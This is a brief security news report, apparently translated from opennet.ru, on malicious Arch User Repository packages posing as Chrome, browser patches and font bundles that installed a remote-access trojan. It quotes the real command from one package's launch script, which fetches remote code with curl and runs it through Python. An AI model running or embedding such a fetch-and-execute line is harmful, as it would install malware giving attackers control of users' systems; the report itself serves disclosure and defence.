The publication of malicious code integrated into packages with unofficial browser builds continues in the AUR (Arch User Repository), used in Arch Linux for distributing packages from third-party developers. In addition to the malicious packages firefox-patch-bin, librewolf-fix-bin, and zen-browser-patched-bin identified two weeks ago, the package google-chrome-stable has also been added to AUR, containing a modification that installs a malicious component providing remote access to the system.
The PKGBUILD file of the problematic package included a script for launching the browser google-chrome-stable.sh, which contained the command 'python -c "$(curl https://segs.lol/9wUb1Z)"', loading malware identified by VirusTotal as the Spark trojan, which allows remote control of the system, process execution, file transfer, traffic inspection, and screenshot capturing.
The malicious package google-chrome-stable was uploaded the day before yesterday and was removed by AUR administrators a few hours after its appearance. Almost immediately after the removal of google-chrome-stable, two malicious packages—"chrome" and "chrome-bin"—were uploaded to AUR, containing a similar script for installing malware on the user's system.
Subsequently, three more packages with malicious code were identified: ttf-mac-fonts-all, ttf-ms-fonts-all, and gromit.
Source: opennet.ru
